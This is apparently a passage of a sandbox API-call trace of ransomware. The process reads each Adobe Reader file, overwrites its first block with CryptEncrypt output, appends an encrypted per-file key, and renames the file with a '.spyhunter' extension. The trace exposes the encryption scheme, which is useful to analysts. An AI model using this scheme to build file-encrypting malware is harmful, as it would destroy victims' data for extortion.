lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f654*=0x2800, lpOverlapped=0x0) returned 1 [0117.285] GetProcessHeap () returned 0x2c0000 [0117.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.285] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.285] WriteFile (in: hFile=0xb4, lpBuffer=0x270f694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x270f694*, lpNumberOfBytesWritten=0x270f654*=0x4, lpOverlapped=0x0) returned 1 [0117.287] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f654*=0x30, lpOverlapped=0x0) returned 1 [0117.288] CloseHandle (hObject=0xb4) returned 1 [0117.288] GetProcessHeap () returned 0x2c0000 [0117.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.288] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Weblink.UKR.spyhunter") returned 86 [0117.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Weblink.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\weblink.ukr"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Weblink.UKR.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\weblink.ukr.spyhunter")) returned 1 [0117.289] GetProcessHeap () returned 0x2c0000 [0117.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.289] GetProcessHeap () returned 0x2c0000 [0117.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.289] GetProcessHeap () returned 0x2c0000 [0117.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e70b20 | out: hHeap=0x2c0000) returned 1 [0117.289] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f698 | out: pbBuffer=0x270f698) returned 1 [0117.289] GetProcessHeap () returned 0x2c0000 [0117.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f690*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f690*=0x30) returned 1 [0117.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Spelling.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\spelling.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0117.301] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Spelling.CHS") returned 77 [0117.301] StrStrW (lpFirst="Spelling.CHS", lpSrch=".txt") returned 0x0 [0117.301] GetProcessHeap () returned 0x2c0000 [0117.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.301] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f654*=0x2000, lpOverlapped=0x0) returned 1 [0117.346] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.346] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f654*=0x2000, lpOverlapped=0x0) returned 1 [0117.346] GetProcessHeap () returned 0x2c0000 [0117.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.346] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.347] WriteFile (in: hFile=0xf4, lpBuffer=0x270f694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x270f694*, lpNumberOfBytesWritten=0x270f654*=0x4, lpOverlapped=0x0) returned 1 [0117.347] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f654, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f654*=0x30, lpOverlapped=0x0) returned 1 [0117.347] CloseHandle (hObject=0xf4) returned 1 [0117.430] GetProcessHeap () returned 0x2c0000 [0117.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.430] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Spelling.CHS.spyhunter") returned 87 [0117.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Spelling.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\spelling.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Spelling.CHS.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\spelling.chs.spyhunter")) returned 1 [0117.430] GetProcessHeap () returned 0x2c0000 [0117.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.431] GetProcessHeap () returned 0x2c0000 [0117.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.431] GetProcessHeap () returned 0x2c0000 [0117.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e71348 | out: hHeap=0x2c0000) returned 1 [0117.431] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f690 | out: pbBuffer=0x270f690) returned 1 [0117.431] GetProcessHeap () returned 0x2c0000 [0117.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.431] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f688*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f688*=0x30) returned 1 [0117.431] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\qrcode.pmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0117.470] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp") returned 84 [0117.470] StrStrW (lpFirst="QRCode.pmp", lpSrch=".txt") returned 0x0 [0117.470] GetProcessHeap () returned 0x2c0000 [0117.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.470] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f64c*=0x2800, lpOverlapped=0x0) returned 1 [0117.480] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.480] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f64c*=0x2800, lpOverlapped=0x0) returned 1 [0117.480] GetProcessHeap () returned 0x2c0000 [0117.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.480] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.480] WriteFile (in: hFile=0x170, lpBuffer=0x270f68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f64c, lpOverlapped=0x0 | out: lpBuffer=0x270f68c*, lpNumberOfBytesWritten=0x270f64c*=0x4, lpOverlapped=0x0) returned 1 [0117.487] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f64c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f64c*=0x30, lpOverlapped=0x0) returned 1 [0117.487] CloseHandle (hObject=0x170) returned 1 [0117.487] GetProcessHeap () returned 0x2c0000 [0117.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.487] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp.spyhunter") returned 94 [0117.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\qrcode.pmp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\qrcode.pmp.spyhunter")) returned 1 [0117.488] GetProcessHeap () returned 0x2c0000 [0117.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.488] GetProcessHeap () returned 0x2c0000 [0117.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0117.488] GetProcessHeap () returned 0x2c0000 [0117.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e69228 | out: hHeap=0x2c0000) returned 1 [0117.915] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f688 | out: pbBuffer=0x270f688) returned 1 [0117.915] GetProcessHeap () returned 0x2c0000 [0117.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0117.915] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f680*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f680*=0x30) returned 1 [0117.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0117.915] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf") returned 96 [0117.915] StrStrW (lpFirst="Standard.pdf", lpSrch=".txt") returned 0x0 [0117.915] GetProcessHeap () returned 0x2c0000 [0117.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.915] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f644*=0x2800, lpOverlapped=0x0) returned 1 [0117.976] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.976] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f644*=0x2800, lpOverlapped=0x0) returned 1 [0117.976] GetProcessHeap () returned 0x2c0000 [0117.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.976] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.976] WriteFile (in: hFile=0xb4, lpBuffer=0x270f684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x270f684*, lpNumberOfBytesWritten=0x270f644*=0x4, lpOverlapped=0x0) returned 1 [0117.981] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f644*=0x30, lpOverlapped=0x0) returned 1 [0117.981] CloseHandle (hObject=0xb4) returned 1 [0118.013] GetProcessHeap () returned 0x2c0000 [0118.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.013] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf.spyhunter") returned 106 [0118.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standard.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standard.pdf.spyhunter")) returned 1 [0118.014] GetProcessHeap () returned 0x2c0000 [0118.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.014] GetProcessHeap () returned 0x2c0000 [0118.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.014] GetProcessHeap () returned 0x2c0000 [0118.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e47990 | out: hHeap=0x2c0000) returned 1 [0118.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f688 | out: pbBuffer=0x270f688) returned 1 [0118.014] GetProcessHeap () returned 0x2c0000 [0118.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.015] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f680*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f680*=0x30) returned 1 [0118.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf") returned 96 [0118.015] StrStrW (lpFirst="Pointers.pdf", lpSrch=".txt") returned 0x0 [0118.015] GetProcessHeap () returned 0x2c0000 [0118.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.015] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f644*=0x2800, lpOverlapped=0x0) returned 1 [0118.017] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.017] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f644*=0x2800, lpOverlapped=0x0) returned 1 [0118.017] GetProcessHeap () returned 0x2c0000 [0118.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.017] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.017] WriteFile (in: hFile=0x154, lpBuffer=0x270f684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x270f684*, lpNumberOfBytesWritten=0x270f644*=0x4, lpOverlapped=0x0) returned 1 [0118.024] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f644, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f644*=0x30, lpOverlapped=0x0) returned 1 [0118.025] CloseHandle (hObject=0x154) returned 1 [0118.025] GetProcessHeap () returned 0x2c0000 [0118.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.025] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf.spyhunter") returned 106 [0118.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\pointers.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\pointers.pdf.spyhunter")) returned 1 [0118.025] GetProcessHeap () returned 0x2c0000 [0118.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.026] GetProcessHeap () returned 0x2c0000 [0118.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.026] GetProcessHeap () returned 0x2c0000 [0118.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48138 | out: hHeap=0x2c0000) returned 1 [0118.026] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f680 | out: pbBuffer=0x270f680) returned 1 [0118.026] GetProcessHeap () returned 0x2c0000 [0118.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.026] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f678*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f678*=0x30) returned 1 [0118.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf") returned 93 [0118.026] StrStrW (lpFirst="Faces.pdf", lpSrch=".txt") returned 0x0 [0118.026] GetProcessHeap () returned 0x2c0000 [0118.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0118.026] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f63c*=0x2800, lpOverlapped=0x0) returned 1 [0118.028] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.028] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f63c*=0x2800, lpOverlapped=0x0) returned 1 [0118.028] GetProcessHeap () returned 0x2c0000 [0118.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0118.028] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.028] WriteFile (in: hFile=0x154, lpBuffer=0x270f67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x270f67c*, lpNumberOfBytesWritten=0x270f63c*=0x4, lpOverlapped=0x0) returned 1 [0118.038] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f63c*=0x30, lpOverlapped=0x0) returned 1 [0118.038] CloseHandle (hObject=0x154) returned 1 [0118.046] GetProcessHeap () returned 0x2c0000 [0118.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.046] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf.spyhunter") returned 103 [0118.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\faces.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\faces.pdf.spyhunter")) returned 1 [0118.047] GetProcessHeap () returned 0x2c0000 [0118.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.047] GetProcessHeap () returned 0x2c0000 [0118.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.047] GetProcessHeap () returned 0x2c0000 [0118.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef50d8 | out: hHeap=0x2c0000) returned 1 [0118.047] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f680 | out: pbBuffer=0x270f680) returned 1 [0118.047] GetProcessHeap () returned 0x2c0000 [0118.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.047] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f678*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f678*=0x30) returned 1 [0118.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.048] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf") returned 95 [0118.048] StrStrW (lpFirst="Dynamic.pdf", lpSrch=".txt") returned 0x0 [0118.048] GetProcessHeap () returned 0x2c0000 [0118.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.048] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f63c*=0x2800, lpOverlapped=0x0) returned 1 [0118.067] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.067] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f63c*=0x2800, lpOverlapped=0x0) returned 1 [0118.067] GetProcessHeap () returned 0x2c0000 [0118.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.067] SetFilePointerEx (in: 